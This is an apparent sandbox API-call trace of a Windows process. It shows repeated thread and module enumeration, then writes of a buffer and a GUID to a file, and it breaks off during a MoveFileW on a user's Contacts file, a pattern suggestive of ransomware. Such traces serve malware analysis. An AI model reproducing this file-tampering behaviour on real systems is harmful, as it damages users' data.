0xdfe0 [0182.748] GetCurrentThreadId () returned 0x264 [0182.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.749] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.750] GetTickCount () returned 0xdfe0 [0182.750] GetCurrentThreadId () returned 0x264 [0182.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.750] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.751] GetTickCount () returned 0xdfe0 [0182.751] GetCurrentThreadId () returned 0x264 [0182.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.751] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.752] GetTickCount () returned 0xdfe0 [0182.752] GetCurrentThreadId () returned 0x264 [0182.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.753] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.754] GetTickCount () returned 0xdfe0 [0182.754] GetCurrentThreadId () returned 0x264 [0182.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.754] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.756] GetTickCount () returned 0xdfe0 [0182.756] GetCurrentThreadId () returned 0x264 [0182.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.756] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.757] GetTickCount () returned 0xdfe0 [0182.757] GetCurrentThreadId () returned 0x264 [0182.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.758] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.759] GetTickCount () returned 0xdff0 [0182.759] GetCurrentThreadId () returned 0x264 [0182.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.759] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.760] GetTickCount () returned 0xdff0 [0182.760] GetCurrentThreadId () returned 0x264 [0182.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.761] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.762] GetTickCount () returned 0xdff0 [0182.762] GetCurrentThreadId () returned 0x264 [0182.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.763] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.764] GetTickCount () returned 0xdff0 [0182.764] GetCurrentThreadId () returned 0x264 [0182.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.764] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.765] GetTickCount () returned 0xdff0 [0182.766] GetCurrentThreadId () returned 0x264 [0182.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.766] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.767] GetTickCount () returned 0xdff0 [0182.767] GetCurrentThreadId () returned 0x264 [0182.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.768] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.769] GetTickCount () returned 0xdff0 [0182.769] GetCurrentThreadId () returned 0x264 [0182.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.769] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.771] GetTickCount () returned 0xdff0 [0182.771] GetCurrentThreadId () returned 0x264 [0182.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.771] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.773] GetTickCount () returned 0xdff0 [0182.773] GetCurrentThreadId () returned 0x264 [0182.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.773] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.775] GetTickCount () returned 0xe000 [0182.775] GetCurrentThreadId () returned 0x264 [0182.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.776] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.777] GetTickCount () returned 0xe000 [0182.777] GetCurrentThreadId () returned 0x264 [0182.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.778] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.779] GetTickCount () returned 0xe000 [0182.779] GetCurrentThreadId () returned 0x264 [0182.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.779] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.780] GetTickCount () returned 0xe000 [0182.781] GetCurrentThreadId () returned 0x264 [0182.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.781] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.783] GetTickCount () returned 0xe000 [0182.783] GetCurrentThreadId () returned 0x264 [0182.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.784] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.790] GetTickCount () returned 0xe00f [0182.790] GetCurrentThreadId () returned 0x264 [0182.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.792] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.796] GetTickCount () returned 0xe00f [0182.796] GetCurrentThreadId () returned 0x264 [0182.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.797] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.800] GetTickCount () returned 0xe00f [0182.800] GetCurrentThreadId () returned 0x264 [0182.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.801] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.804] GetTickCount () returned 0xe00f [0182.805] GetCurrentThreadId () returned 0x264 [0182.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.805] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.808] GetTickCount () returned 0xe01f [0182.808] GetCurrentThreadId () returned 0x264 [0182.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.809] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.812] GetTickCount () returned 0xe01f [0182.812] GetCurrentThreadId () returned 0x264 [0182.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.813] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.816] GetTickCount () returned 0xe01f [0182.816] GetCurrentThreadId () returned 0x264 [0182.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.817] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.820] GetTickCount () returned 0xe01f [0182.820] GetCurrentThreadId () returned 0x264 [0182.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.835] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.837] GetTickCount () returned 0xe03e [0182.837] GetCurrentThreadId () returned 0x264 [0182.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.838] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.841] GetTickCount () returned 0xe03e [0182.841] GetCurrentThreadId () returned 0x264 [0182.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.841] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.843] GetTickCount () returned 0xe03e [0182.843] GetCurrentThreadId () returned 0x264 [0182.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.844] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.846] GetTickCount () returned 0xe03e [0182.846] GetCurrentThreadId () returned 0x264 [0182.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.847] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.848] GetTickCount () returned 0xe03e [0182.848] GetCurrentThreadId () returned 0x264 [0182.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.849] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.851] GetTickCount () returned 0xe04e [0182.851] GetCurrentThreadId () returned 0x264 [0182.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.852] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.854] GetTickCount () returned 0xe04e [0182.854] GetCurrentThreadId () returned 0x264 [0182.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.855] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.856] GetTickCount () returned 0xe04e [0182.856] GetCurrentThreadId () returned 0x264 [0182.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.857] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.859] GetTickCount () returned 0xe04e [0182.859] GetCurrentThreadId () returned 0x264 [0182.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.859] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.861] GetTickCount () returned 0xe04e [0182.861] GetCurrentThreadId () returned 0x264 [0182.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.862] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.864] GetTickCount () returned 0xe04e [0182.864] GetCurrentThreadId () returned 0x264 [0182.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.864] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.866] GetTickCount () returned 0xe04e [0182.866] GetCurrentThreadId () returned 0x264 [0182.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.867] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.869] GetTickCount () returned 0xe05d [0182.869] GetCurrentThreadId () returned 0x264 [0182.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.869] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.871] GetTickCount () returned 0xe05d [0182.871] GetCurrentThreadId () returned 0x264 [0182.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.872] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.874] GetTickCount () returned 0xe05d [0182.874] GetCurrentThreadId () returned 0x264 [0182.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.874] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.876] GetTickCount () returned 0xe05d [0182.876] GetCurrentThreadId () returned 0x264 [0182.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.877] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.879] GetTickCount () returned 0xe05d [0182.879] GetCurrentThreadId () returned 0x264 [0182.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.879] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.882] GetTickCount () returned 0xe05d [0182.882] GetCurrentThreadId () returned 0x264 [0182.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.882] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.885] GetTickCount () returned 0xe06d [0182.885] GetCurrentThreadId () returned 0x264 [0182.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.885] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.887] GetTickCount () returned 0xe06d [0182.887] GetCurrentThreadId () returned 0x264 [0182.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.887] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.889] GetTickCount () returned 0xe06d [0182.889] GetCurrentThreadId () returned 0x264 [0182.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.889] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.890] GetTickCount () returned 0xe06d [0182.890] GetCurrentThreadId () returned 0x264 [0182.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.891] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.892] GetTickCount () returned 0xe06d [0182.892] GetCurrentThreadId () returned 0x264 [0182.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.893] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.894] GetTickCount () returned 0xe06d [0182.894] GetCurrentThreadId () returned 0x264 [0182.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.894] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.896] Module32First (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.897] GetCurrentThreadId () returned 0x264 [0182.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.897] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.898] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.899] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.900] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.901] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.902] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.903] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.904] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.905] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.906] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.906] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.908] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.909] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.910] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.911] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.912] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.913] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.914] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.915] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.916] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.917] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.918] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.919] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.920] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.921] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.922] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.923] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.924] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.924] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.925] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.927] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.928] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.930] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.931] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.932] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.934] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.935] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.936] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.937] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.939] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.940] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.941] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.943] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.944] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.945] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.947] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.948] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.949] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.950] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.952] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.953] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.955] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.956] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.958] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.959] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.960] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.962] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.963] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.964] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.966] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.967] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.969] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.970] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.971] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.973] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.974] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.976] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.977] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.978] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.980] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.981] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 1 [0182.983] Module32Next (hSnapshot=0x594, lpme=0x30ff034) returned 0 [0182.984] CloseHandle (hObject=0x594) returned 1 [0182.984] FreeLibrary (hLibModule=0x76680000) returned 1 [0182.984] QueryPerformanceCounter (in: lpPerformanceCount=0x30fefa4 | out: lpPerformanceCount=0x30fefa4*=1624365075490) returned 1 [0182.984] GetCurrentThreadId () returned 0x264 [0182.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.985] GlobalMemoryStatus (in: lpBuffer=0x30ff414 | out: lpBuffer=0x30ff414) [0182.987] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x10b1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.987] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0182.988] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0182.988] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0182.988] CloseHandle (hObject=0x584) returned 1 [0182.991] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact" (normalized: "c:\\users\\keecfmwgj\\contacts\\administrator.contact"), 